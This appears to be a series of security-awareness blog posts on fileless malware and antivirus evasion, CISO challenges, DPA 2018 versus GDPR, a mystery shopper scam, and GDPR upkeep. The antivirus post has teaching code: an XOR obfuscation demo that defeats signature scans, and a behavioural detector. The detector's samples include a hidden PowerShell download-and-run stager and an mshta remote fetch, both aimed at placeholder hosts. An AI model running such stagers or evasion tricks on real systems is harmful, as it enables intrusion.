By the mid-2000s antivirus software had reached mythical status in the history of computing. It was an unusual person who did not have antivirus software installed on their computer, especially if running a Microsoft Windows machine.

Then something happened. In 2014 a Symantec senior vice president announced that antivirus software was “dead”. He went on to explain that antivirus software was catching only about 45% of malware threats, leaving the other 55% free to wreak havoc on our IT infrastructures. A scary announcement like that, from an antivirus vendor, sent shock waves through the industry.

So, why was this? What changed? How was this new pesky malware evading capture?

How Antivirus Software Met Its Match

You may have noticed that there is a lot of talk about antibiotic resistance in the world, with bacteria evolving resistance to the drugs meant to kill them. This is nicely analogous to the fall of traditional antivirus software. Like its bacterial equivalent, malware is updated by the programmers who create it to thwart its attacker: the antivirus scanner.

Traditional antivirus software uses something called a ‘signature’ to detect malware. A signature is a sequence of bytes (or a hash of them) that is unique to a known malware sample or family. A traditional scan searches files on disk for those bytes; on a match, the file is isolated and quarantined, and deleted if required.

Another technique used by antivirus software is called “heuristic detection”. Instead of exact bytes, this uses rules that look for suspicious characteristics or actions, such as code that adds itself to autorun registry keys or injects into another process; once a file or process crosses a threshold of suspicious points, a virus alert appears.

But life is never simple, is it? Cybercriminals learned to pack, encrypt and recompile their software so that the very bytes a signature was written against never appear on disk in the same form twice, leaving the scanner nothing to match.

Damn their cunning ways.
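The three ideas above (a byte signature, a rule-based heuristic, and the obfuscation that hides the bytes) in a few lines of Python. This is an added example, not code from the original post or from any vendor: the sample bytes, the marker string used as the ‘signature’ and the list of suspicious API names are all constructed, and the XOR packer and the single-byte ‘x-ray’ brute force are deliberately simple stand-ins for real packers and real engine features.

```python
"""Signature scanning, a heuristic, and the obfuscation that defeats the
signature. Added example with constructed samples: nothing here is a real
malware family, and the 'signature' is an invented marker string."""
import math
from collections import Counter

# Constructed stand-in for a malicious binary: a fake header, some padding,
# injection-related API names, and a marker string a vendor has signatured.
ORIGINAL_SAMPLE = (
    b"MZ\x90\x00" + b"\x00" * 64
    + b"CreateRemoteThread\x00WriteProcessMemory\x00VirtualAllocEx\x00"
    + b"EVILNET-C2-TOKEN-7f3a"          # invented marker: the 'few unique bytes'
    + b"\x00" * 64
)
SIGNATURES = {"Trojan.Constructed.A": b"EVILNET-C2-TOKEN-7f3a"}   # constructed
SUSPICIOUS_APIS = [b"CreateRemoteThread", b"WriteProcessMemory", b"VirtualAllocEx"]


def signature_scan(data, signatures=SIGNATURES):
    """Exact byte-sequence match: the traditional signature check."""
    return [name for name, sig in signatures.items() if sig in data]


def heuristic_score(data, apis=SUSPICIOUS_APIS):
    """Rule-based heuristic: count injection-related API names in the image.
    A real engine would alert once the count crosses a threshold."""
    return sum(1 for api in apis if api in data)


def shannon_entropy(data):
    """Bits per byte; packed or encrypted content pushes this towards 8."""
    counts = Counter(data)
    n = len(data)
    return -sum(c / n * math.log2(c / n) for c in counts.values())


def xor_obfuscate(data, key):
    """Attacker side: repeating-key XOR, a stand-in for a simple packer.
    XOR is its own inverse, so the same call with the same key decodes."""
    return bytes(b ^ key[i % len(key)] for i, b in enumerate(data))


def xray_scan(data, signatures=SIGNATURES):
    """Defender's reply: try every single-byte XOR key before matching, the
    'x-ray' trick engines use against trivial encoders."""
    return [(name, k) for k in range(256)
            for name in signature_scan(xor_obfuscate(data, bytes([k])), signatures)]


if __name__ == "__main__":
    single = xor_obfuscate(ORIGINAL_SAMPLE, b"\x5a")
    multi = xor_obfuscate(ORIGINAL_SAMPLE, b"\x5a\xc3\x17\x9e")
    for label, sample in [("original", ORIGINAL_SAMPLE),
                          ("1-byte xor", single), ("4-byte xor", multi)]:
        print(f"{label:10s} sig={signature_scan(sample)} "
              f"heur={heuristic_score(sample)} xray={xray_scan(sample)} "
              f"entropy={shannon_entropy(sample):.2f}")
```

Run it and the 1-byte XOR variant defeats both the exact-match signature and the string heuristic, yet the x-ray brute force recovers it. The 4-byte key defeats the x-ray too, and the only thing left pointing at the sample is the rise in entropy (a single-byte XOR preserves entropy exactly, so that heuristic does not even notice the first variant). That is the arms race in miniature, and it is why engines moved on to emulating the unpacker and scanning the unpacked image in memory.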

The Perfect Cybercrime – Fileless Malware

Fileless malware – the clue is in the name – is the enemy of traditional antivirus software because it never writes a malicious executable to the hard drive: the payload is resident only in computer memory (RAM), usually run through legitimate tools that are already on the machine, such as PowerShell or WMI. It is like the perfect crime; the trick is to leave no evidence for the ‘cops’ to find. Not quite no evidence, in practice: the persistence tricks that survive a reboot (registry entries, WMI subscriptions, scheduled tasks) do leave traces, and memory forensics can recover the payload, but there is no file on disk for a scanner to hash.

Fileless attacks have the same end result as their file-based cousins: a malware infection used to control, steal, and expose. They use the same delivery routes too – a phishing email link may take you to a site that then launches a fileless attack. Security solutions that need a file on disk to scan for a signature have nothing to scan, so a fileless attack goes under the radar of any organisation relying on traditional antivirus software alone. It is only caught by watching what processes do, not by what their files look like.

Because of this sneaky feature, fileless malware attacks were up by 94% in 2018, according to SentinelOne. The Ponemon Institute painted a similar picture, predicting that 35% of cyber-attacks in 2018 would be fileless.

Antivirus Software is Dead, Long Live Antivirus Software

But cybercriminals are not the only ones who can evolve. Antivirus vendors have seen the fileless bet and raised it. There are now solutions that look specifically for the smoke signals of a fileless attack. I have listed a few of the vendors who specialise in this area below, but most use continuous, automated monitoring of endpoints and the network, looking for patterns of process behaviour associated with these attacks (a document reader launching a script host, PowerShell started with a hidden window and an encoded command, a system tool handed a remote URL) rather than for a file to scan.

And, of course, malware attacks are not always fileless. So modern antivirus/anti-malware solutions are still an important part of your cybersecurity measures, as they also keep the traditional signature and heuristic-based scans.
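What “looking for patterns of behaviour” means in practice, as an added example (not the original post’s or any vendor’s detection logic): a scorer over process-creation events of the kind Sysmon or an EDR agent records. The four events, the domain example.invalid, the rule weights and the alert threshold are all constructed for the example; the -EncodedCommand decoding (base64 of UTF-16LE) is how PowerShell itself defines that switch.

```python
"""Behavioural scoring of process-creation events for fileless tradecraft.
Added example: the events are constructed in the style of a Sysmon/EDR
process-creation log; weights and threshold are assumptions, not any
vendor's rules."""
import base64
import re

OFFICE_APPS = {"winword.exe", "excel.exe", "powerpnt.exe", "outlook.exe"}
SCRIPT_HOSTS = {"powershell.exe", "pwsh.exe", "wscript.exe", "cscript.exe",
                "mshta.exe", "cmd.exe", "regsvr32.exe", "rundll32.exe"}
URL_LOLBINS = {"mshta.exe", "regsvr32.exe", "rundll32.exe"}

# (regex run over the command line plus any decoded script, weight, label)
CONTENT_RULES = [
    (r"(?i)\b(?:iex|invoke-expression)\b", 3, "in-memory execution (IEX)"),
    (r"(?i)downloadstring|downloadfile|invoke-webrequest|net\.webclient", 3, "download cradle"),
    (r"(?i)frombase64string", 2, "base64 decode of embedded payload"),
    (r"(?i)-w(?:indowstyle)?\s+hidden", 2, "hidden window"),
    (r"(?i)-nop\b|-noprofile\b", 1, "profile suppressed"),
    (r"(?i)-ep\s+bypass|-exec(?:utionpolicy)?\s+bypass", 2, "execution policy bypass"),
    (r"(?i)reflection\.assembly\]::load", 3, "reflective assembly load"),
]
ENCODED_ARG = re.compile(r"(?i)-(?:enc(?:odedcommand)?|ec|e)\s+([A-Za-z0-9+/=]{16,})")
REMOTE_URL = re.compile(r"(?i)\bhttps?://")


def decode_encoded_command(cmdline):
    """Return the script behind -EncodedCommand (base64 of UTF-16LE), or None."""
    m = ENCODED_ARG.search(cmdline)
    if not m:
        return None
    try:
        return base64.b64decode(m.group(1)).decode("utf-16-le")
    except (ValueError, UnicodeDecodeError):
        return None


def evaluate(event):
    """Score one process-creation event; returns (score, reasons)."""
    score, reasons = 0, []
    parent, image, cmdline = event["parent"].lower(), event["image"].lower(), event["cmdline"]
    if parent in OFFICE_APPS and image in SCRIPT_HOSTS:      # document spawned a script host
        score += 4
        reasons.append(f"{parent} spawned {image}")
    if image in URL_LOLBINS and REMOTE_URL.search(cmdline):  # system tool fetching remote code
        score += 5
        reasons.append(f"{image} given a remote URL")
    decoded = decode_encoded_command(cmdline)
    if decoded is not None:
        score += 2
        reasons.append("encoded command decoded")
    haystack = cmdline + "\n" + (decoded or "")              # inspect the decoded script too
    for pattern, weight, label in CONTENT_RULES:
        if re.search(pattern, haystack):
            score += weight
            reasons.append(label)
    return score, reasons


def scan(events, threshold=5):
    """Return (index, score, reasons) for every event at or above the threshold."""
    alerts = []
    for i, event in enumerate(events):
        score, reasons = evaluate(event)
        if score >= threshold:
            alerts.append((i, score, reasons))
    return alerts


def _ps_encode(script):
    """Build a sample the way -EncodedCommand expects its argument."""
    return base64.b64encode(script.encode("utf-16-le")).decode("ascii")


# Constructed download-and-run stager; example.invalid is a reserved, non-resolving domain.
STAGER = "IEX (New-Object Net.WebClient).DownloadString('http://example.invalid/stage.ps1')"

SAMPLE_EVENTS = [  # constructed process-creation events: parent image, image, command line
    {"parent": "explorer.exe", "image": "powershell.exe",
     "cmdline": r"powershell.exe -NoProfile -File C:\scripts\nightly-backup.ps1"},
    {"parent": "WINWORD.EXE", "image": "powershell.exe",
     "cmdline": "powershell.exe -nop -w hidden -enc " + _ps_encode(STAGER)},
    {"parent": "services.exe", "image": "svchost.exe",
     "cmdline": "svchost.exe -k netsvcs -p"},
    {"parent": "cmd.exe", "image": "mshta.exe",
     "cmdline": "mshta.exe http://example.invalid/update.hta"},
]

if __name__ == "__main__":
    for index, score, reasons in scan(SAMPLE_EVENTS):
        print(f"ALERT event {index} score={score}: {', '.join(reasons)}")
```

Nothing here hashes a file: the admin’s backup script scores one point for suppressing the profile and is left alone, while the Word-spawned PowerShell is flagged on what it was asked to do, even though the only thing on disk is a command line. The base64 decode matters; without it the stager’s IEX and DownloadString would be invisible, which is exactly why attackers encode it.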

Layering Technology and Humans to Stop Fileless Attacks in Their Invisible Tracks

Having software that monitors your network is only part of the solution in modern-day cyber-warfare. Technical security measures are one part of a wider scope of protection. Because many cyber-threats begin with social engineering, taking advantage of human behaviour, they need a human-centred approach too.

Many cyber-attacks, including those that are fileless, need a human being to initiate the sequence of events that leads to malware infection. Phishing is the perfect and ubiquitous example. Phishing relies on a human operator clicking a link or opening a document; the infection then follows, by fileless or traditional methods of code execution. It is the perfect storm of human and technology being used to exploit your organisation.

Security awareness training is the most effective way of stopping the early part of the infection process. It is your first layer of protection against cyber-attacks, including malware infection; your staff act as a filter before anything even gets to the point of being caught by antivirus software.

Five Examples of Endpoint Security Vendors

Once you have your staff ready and cyber-safe, you can look at the right vendor to provide your next layer of defence – the antivirus/anti-malware solution often included in more comprehensive ‘endpoint’ security solutions. There are lots of offerings in this area, for both home and business use; we’ve only shown a few here to whet your appetite:

Malwarebytes – Endpoint Protection and Response: Malwarebytes offers solutions for home and business. Its home anti-malware product installs on a machine and acts like a traditional antivirus solution, performing regular scans for known viruses and malware. It also blocks ransomware and stops exploit kits from running if you land on a spoof website. The business kit brings several security options together under one agent.

Trend Micro – Apex One: An endpoint solution that uses a number of techniques to spot malicious behaviour, based on collated threat intelligence. It helps to prevent fileless attacks as well as ransomware, and has many bolt-on modules to add more features.

Bitdefender – Antivirus Plus: The home edition offers advanced antivirus features and ransomware prevention. For the full feature set you have to upgrade to Bitdefender’s more comprehensive security suite.

Kaspersky – Antivirus: Scans to locate infections and quarantines any files found. Protects against ransomware and crypto-mining bots.

Panda Labs – Antivirus: Described as “next gen” antivirus software. It uses continuous monitoring based on behavioural intelligence to spot fileless attacks as well as more traditional malware infection.

A Virus Free Future?

It is unlikely that malware will disappear. It is a highly effective way to take control of IT resources, steal login credentials, expose data, and cause outages.

So, we have to work out ways to keep our organisation safe from this ever-present threat. Antivirus solutions have evolved to stay in line with the changing nature of malware threats, but they are not a solution on their own. We have to put layers of protection in place to thwart the sophisticated methods used to circumvent technical measures.

Making sure that our staff are security aware is the most fundamental thing we can do to protect our company against a cyber-attack. Our staff are our foot soldiers. Well trained, they close off many of the ways into our network.

Want to learn more about empowering your employees’ security defences?  Why not sign up for a free demo and find out how we’re already helping organisations just like yours.


If you make it to the heady heights of Chief Information Security Officer (CISO) in your career, you are doing pretty well. But CISOs haven’t always been around; information security used to be somebody else’s problem, and sometimes still is.

In the 90s, security was pretty much an afterthought for anyone other than a dedicated security professional. This, of course, was before the Internet and mobile computing reached everyone.

Back in 2016, IBM put out a statistic stating that 90% of the world’s data had been generated in the previous 2 years. And data just continues to burst out of every IoT device, online transaction, and mobile phone communication.

This makes the job of the person heading up information security complex. The CISO, chief of keeping our data safe, has a big job on their hands. They have the multi-pronged task of managing the day-to-day IT and data security threats, as well as managing and maintaining the ever-changing compliance requirements of the business. And all of this within the shifting sands of the cybersecurity landscape as data explodes.

In a report by the Ponemon Institute, commissioned by F5, which looked at the role of the CISO, they found that 60% of CISOs place cybersecurity as a business priority.

So, what sort of things makes the average CISO stay awake at night?

Budgets, or lack thereof

Budgeting for a solid and timely response to cyber-threats can be tricky. Security is often seen as non-core to the business, so the area may end up with the budget equivalent of crumbs when year-end comes around. Of course, the CISO is left with the job of convincing the C-level and board members that security must be taken seriously. However, the cybercrime statistics can do a pretty good job of helping to convince the board that your department needs proper funding. In 2018, more than 2.8 billion data records were exposed. In the same year, 40 percent of small businesses were victims of a data breach; a single incident resulted in a 20 percent loss in customer base.

Figures like this can then be used to show the cost to a business, both as a reputation and financial consideration to create a case for a realistic budget.

The hunt for skilled staff

A CISO is not an island. They need skilled people to work alongside them, to take their security strategies and implement the measures across the company. These skilled staff are not just security professionals; there is also a need for people who understand compliance and training. In a survey by McAfee into shortages of skilled staff in the security industry, 82% of those surveyed reported a shortage of cybersecurity skills. This tallies with a recent (ISC)² report which states there will be a gap of 1.8 million jobs in cybersecurity by 2022.

Outsourcing is an option here, but again, this ties in with budgets.

The old compliance chestnut

Data protection and privacy regulations are there to protect our company and our customers. However, they can be hard work to implement. This is especially true when you have more than one type of regulation to comply with. For example, if you process payment card data then you will need to comply with at least PCI DSS, but also, very likely, the GDPR and the UK-specific provisions of the DPA 2018. The array of regulatory frameworks around data protection can take your breath away.

Compliance is a company wide issue that falls on the shoulders of the CISO and their team. But a budget has to be set to help meet the stringent requirements of modern regulations. Again, the financial bottom line can help with this, as regulations like GDPR and DPA 2018 set massive fines for non-compliance.

Building a Culture of Security

One thing that helps with the general job of the CISO is having everyone on board. The old saying of “There is no i in team” is so true. Bringing the entire organisation together under the banner of a “Culture of Security” makes the CISO job a little bit easier. Why is this? Security awareness training is the foundation stone of this Culture of Security. If you use security awareness training to teach all staff about what cybersecurity is, how to spot tell-tale signs of security issues, and how to act in a security preserving manner, many of the challenges of protecting the company will be reduced because of the old adage “many hands make light work”.

The changing security landscape

In life, there are certain things that never change, but cybercrime is not one of them. If you look at the malware numbers from AV-TEST, they show increasing malware counts, year on year, since 2010. And the types of threats change too. In 2016, ransomware was one of the biggest threats; in 2017, cryptojacking had risen in rank with an 8,500% increase in attacks, with the UK’s National Cyber Security Centre placing it as a “significant” threat to UK business.

A CISO has their work cut out as they have to navigate this ever-changing landscape to ensure the company has the right precautions in place. They need to do this in an environment of support. A CISO and their team need to be visible and not seen as the “backroom boys and girls”. When a company spends the time to build a Culture of Security, they also embrace the idea that the whole company is responsible for being cyber-safe. In this situation, the ever-changing cybersecurity landscape is less of a concern as the CISO has everyone watching the company’s back. Of course, this means that security awareness training is not a one-off exercise. Keeping on top of security is not just the CISO’s responsibility, it is in the interest of the entire company.

Giving the CISO a Helping Hand

It can be lonely at the top, and the best way to help cybercriminals is to isolate people. The people in our organisations are our best defence against cyber-threats. The CISO is the person most well-placed to set in motion the wheels of security awareness training to pull the company together in defending against cyber-attacks.

And a final word from ClubCISO. In a survey, they asked CISOs how strongly they agree with the statement “I love my job”.

28% said they “strongly agreed”. Hopefully, with the help of colleagues to make this most complex of jobs easier, this number will increase.

Source: ClubCISO IT Security Maturity Report. All content © ClubCISO/Company85


Over the last couple of years, compliance has become a bane of our business lives. Like a spectre hanging over our heads, the General Data Protection Regulation (GDPR) pulled at our time and resources. The regulation was finally enacted on May 25, 2018. But in the UK, we also have the Data Protection Act (DPA) hanging around our necks.

The UK’s first DPA entered our working lives back in 1984. It was replaced by the DPA 1998, which implemented the GDPR’s predecessor, the EU’s Data Protection Directive (DPD) 1995 (Directive 95/46/EC). The DPA, like the EU’s DPD, is a law that determines how we, as a business, protect personal data.

Jump forward to 2018 and all hell breaks loose when the EU’s DPD is replaced by the GDPR. And, along with it, the UK’s DPA becomes the DPA 2018.

In this article, I’ll take a look at the two acts and where they coincide or diverge. Hopefully, this will shine a light on them, so you don’t replicate work or miss vital requirement differences.

What the DPA 2018 and GDPR Have in Common

In general, the DPA 2018 and the GDPR are laws that are there to protect personal data. For the most part, the two overlap. They both defend the data subject rights set out in the GDPR; these rights ensure that the owners of the personal data, aka your customers, employees, etc., can control the data they share with you.

One thing worth noting: the previous DPA had much lower fine thresholds. This is demonstrated by the £385,000 fine levied on Uber, under the DPA 1998, for failing to protect personal data during its 2016 breach. Now the DPA has embraced the much larger fine levels of the GDPR: up to 4% of annual global turnover or 20 million euros, whichever is higher.

Where the DPA 2018 and GDPR Diverge

The DPA 2018, moves away from the GDPR in certain areas. The DPA 2018 is split into seven individual parts; according to the Information Commissioner’s Office (ICO) the areas of divergence are in parts 2,3, and 4:

Part 2 – Chapter 2: This deals in detail with the GDPR provisions.

This chapter adds detail to the GDPR requirements and extends them to meet UK needs.

  • This section sets out in clear terms the meaning of ‘controller’, ‘public authority’ and ‘public body’.
  • Consent for children is set at 16-years in the GDPR, the DPA 2018 sets the age limit at 13-years.
  • Special categories of data have more stringent protection under the GDPR. The DPA 2018 is updated to apply more granularity and extend the circumstances they can be processed. For more details see section 11 of part 2 of the act.
  • Limits are placed on the fees a data controller may charge for dealing with data subject requests.
  • Safeguards for automated decision making are extended, the act explaining what a “significant decision” entails.
  • Credit reference agencies are offered a limit on the extent to which the GDPR’s right of access applies.
  • Accreditation of certification is limited to the Commissioner or the national accreditation body, which, in the UK, is UKAS.
  • This section is particularly interesting – “Power to make further exemptions etc by regulations” it builds in a provision to make exemptions to various articles of the GDPR, including several data subject rights such as the right to erasure and right to access.
  • Safeguards for using data for research and archiving
  • Transferring data to third countries is also extended, especially if it is deemed to be in the public interest.

Part 2 – Chapter 3: Other General Processing, also termed “the Applied GDPR”

This extends the GDPR to cover certain unusual or rare circumstances. Schedule 6 of the DPA 2018 goes into further details.

The main extensions are in the areas:

  • automated or structured processing of personal data in circumstances where the processing:
    • falls outside the scope of EU law
    • falls within the scope of Article 2(2)(b) of the GDPR (common foreign and security policy activities)
  • manual, unstructured personal data held by an FOI public authority

Part 3 – Law enforcement data processing

This chapter applies specifically to law enforcement agencies. If you are wondering what this means, specifically, here is the section pulled out which defines law enforcement in this context:

““the law enforcement purposes” are the purposes of the prevention, investigation, detection or prosecution of criminal offences or the execution of criminal penalties, including the safeguarding against and the prevention of threats to public security.”

The major difference between this section and the GDPR is that the requirement to process personal data transparently has been removed (to prevent any prejudice in a criminal investigation).

Part 4 – The “Intelligence Services” section

This section applies to three identified intelligence agencies, namely the Security Service (MI5), the Secret Intelligence Service (MI6) and GCHQ.

This section reflects the GDPR data subject rights, including the rights to erasure, access, rectification, etc. The regime for the three covered entities is slightly modified from the GDPR, with wording around ‘security measures’ as opposed to ‘technical and organisational measures’.

And Finally, the Dreaded B Word

I have to bring it up, sorry. I don’t want to, but I must. Brexit. How does leaving the EU impact the UK’s data protection laws?

The DPA 2018 is a UK law and so should not be affected by leaving the EU unless Parliament decides it will be. And let’s face it, who knows the answer to that one.

Ultimately, however, the GDPR is a very wide-reaching regulation with an extraterritorial reach. If we leave the EU, your organisation may still be held to account by the GDPR if it offers goods or services to, or monitors the behaviour of, individuals in an EU state.


When we think about the concept of a ‘mystery shopper’ we often have an image of going into shops or restaurants and getting goodies for free and being paid for the pleasure. There is an air of excitement about being a mystery shopper and people do genuinely work in the area of customer satisfaction research, checking out customer experiences. This week’s scam offers a lucrative position as a mystery shopper. I have received a number of these scams in the last few weeks, all offering financial rewards for shopping – all I have to do is provide some personal data.

This week’s mystery shopper scam has some stark differences when compared with some of the other scams I’ve talked about over the last few months:

[Image: mystery shopper email scam]

What is different from the other scam emails?

  1. They are NOT based on a well-known brand. The emails are generic and use phrases like ‘Mystery Shopper’ to entice you in.
  2. The scam emails do not have any links to click on; instead, they require a reply action to send them your personal data.

What they do have in common:

  1. They offer a financial reward of several hundred dollars (the email is obviously meant for a U.S. audience, hence the USD offer). However, watch out for similar GBP-based scam emails.
  2. They ask you to give them your personal data (phishing) to apply for the job of mystery shopper:

—-Name:
—-Email:
—-Street:
—-City:
—-State:
—-ZIP Code:
—-Phone:
—-Gender:

  3. The language used in the email body was poorly executed. For example:

“18 Years Can speak local language well

No experience needed like shopping”

This scam is not the most sophisticated scam email I have seen. However, mystery shopper scams work, and they have been operating in various guises for many years. If you reply to a mystery shopper scam and send over your personal data, that data will be used to commit fraud in your name. There were over 1 million cases of fraudulent financial transactions in the UK in the first half of 2018, with £358 million in losses. If you hand over your personal data to scammers you could end up as yet another fraud statistic.

Needless to say, never, ever send personal data such as name, address, age, etc. to any source unless you are thoroughly happy with their legitimacy.

If you do want to become a mystery shopper, do your research first.

If you receive a mystery shopper scam email and are concerned, you can report it to Action Fraud, The National Fraud and Cyber Crime Reporting Centre.

Example of a Mystery Shopper Scam email

[Image: mystery shopper email scam]

Why not help your colleagues stay safe and send them this little reminder. Feel free to edit, copy/paste the advice below:

The Mystery Shopper Scam

Look out for a suspicious email which offers financial rewards for becoming a mystery shopper.

The email will ask for various personal details, including name, address, age, etc.

The email is a scam and sending any personal data to the scammer will likely result in your details being used to commit fraud.

If you receive an email like this and are concerned, you can report it to Action Fraud, The National Fraud and Cyber Crime Reporting Centre.

Don’t forget to share this with your colleagues and friends and help them stay safe.

Let’s keep breaking scams!


The General Data Protection Regulation (GDPR) came into our lives like a tornado. It swept through our business processes and spat us out. Well, that is certainly how it felt at the time.

Now, almost a year on, where do we stand?

Has your organisation recovered enough to take a breather or are you still wondering what a DPIA is and do you really need to take consent from customers you’ve had for ten years?

By February of this year, over 59,000 organisations had made a data breach notification to their local authorities. Around 10,600 of those were from UK companies. The GDPR is not going away and we have to make sure we deal with it efficiently and effectively.

With this in mind, as we move into the second year of being under the GDPR hood, what sort of things do we need to re-address or keep an eye on?

Keeping Up with the GDPR

There are a few housekeeping points you need to keep on top of to maintain compliance with GDPR requirements. The main ones include:

GDPR requirements refresher course

It is always useful to refresh your knowledge around what the requirements of GDPR actually are. Even if you have a dedicated Data Protection Officer (DPO) who has the job of keeping your organisation in line with the GDPR, your staff may have forgotten what it is all about. Staff GDPR refresher course training helps to keep your staff focused on the importance of data privacy. These refresher courses are particularly important for staff who handle data, such as HR, marketing, IT, and sales.

Reviewing your processes and suppliers

By now you will have been through the internal review of your processes which are impacted by GDPR. But a ‘good once over’ often misses important areas. And, things change over time. You may have updated your privacy policy for GDPR but have you, since then, changed the data you collect, or the company that processes it for you?

Any update that fundamentally changes the data processing of your organisation needs to be checked for GDPR compliance. To recap:

  • Review your data processing procedure
  • Check your data capture and any new data brought under your control. This includes any special category data under the GDPR which covers areas such as trade union membership, biometrics, health data.
  • Review your consent process a year on – did you capture the consents you were supposed to? If you manage consents using a basis of ‘legitimate interest’ have you carried out a Legitimate Interest Assessment (LIA) to show compliance?
  • Have you changed suppliers, adding or removing vendors from your supply list? If so, make sure you have covered the GDPR requirements for processors, so that they handle any data you collect within the expectations of the regulation.

Updating policies

A security policy is not a static entity. It is only as good as the security and data protection landscape that it represents. Review your security policy to see if you need to update any areas, especially around data protection regulations like GDPR. The review you do that looks at processes, collection, and suppliers, will feed into this task.

Where you do find gaps in your policy, plug them with updated information and procedures. And, don’t forget to make sure that all staff, from C-Level down, know the policy has been updated. You may also require policy training to help with implementation of any new processes.

Review and update your DPIA

A Data Protection Impact Assessment (DPIA) is a process, carried out by a suitably qualified individual or firm, that looks at your processes and procedures to see whether they put individuals’ privacy at risk, and identifies measures to address any issues found. Under the GDPR (and the UK’s DPA 2018) a DPIA is mandatory wherever processing is likely to result in a high risk to individuals, such as large-scale profiling or systematic monitoring. The UK’s Information Commissioner’s Office (ICO) has guidance on how to perform one.

Keep on top of cyber threats

Being aware of security threats is an important aspect of modern business. The cyber-threat landscape is an ever-changing place, as cybercriminals continuously up their game to keep us on our toes. Data privacy is an aspect of data security that is often impacted by cybercrime. Use regular security awareness training, such as online training videos, to keep staff aware of the daily risks to personal data from using email, mobile devices, etc. An aware staff member is a safer and more regulation-compliant staff member.

Review your approach to compliance

Compliance, including regulations that involve data protection, has become an everyday part of business life. But the compliance landscape, including the approach to policing and enforcing regulations, can change. This can, in turn, affect how you approach regulatory compliance in your organisation. Keep a watchful eye on the ICO’s Regulatory Action Policy document which sets out what powers the ICO has and how they apply them. Understanding this may help you to adjust the way you approach your own compliance requirements.

The Carousel of Compliance

All of the above demonstrates that staying within the bounds of regulatory compliance and meeting the requirements of the GDPR is not a one-off task. Regulatory frameworks on privacy and security are there to reflect the needs of our digital society, and they themselves are not static; the GDPR is a result of the growing use of personal data in a connected world. The best way to minimise the upheaval of compliance is to get into a routine of regular review. Once you have this in place and have done it a couple of times it will become easier. In the end, with fines as high as 4% of annual global turnover or 20 million euros, whichever is higher, getting your house in order and keeping it there is a worthwhile job.

Looking to tick one job off the GDPR to-do list?  Why not check out our GDPR Awareness training or sign up for a free demo of our wider security awareness training services.
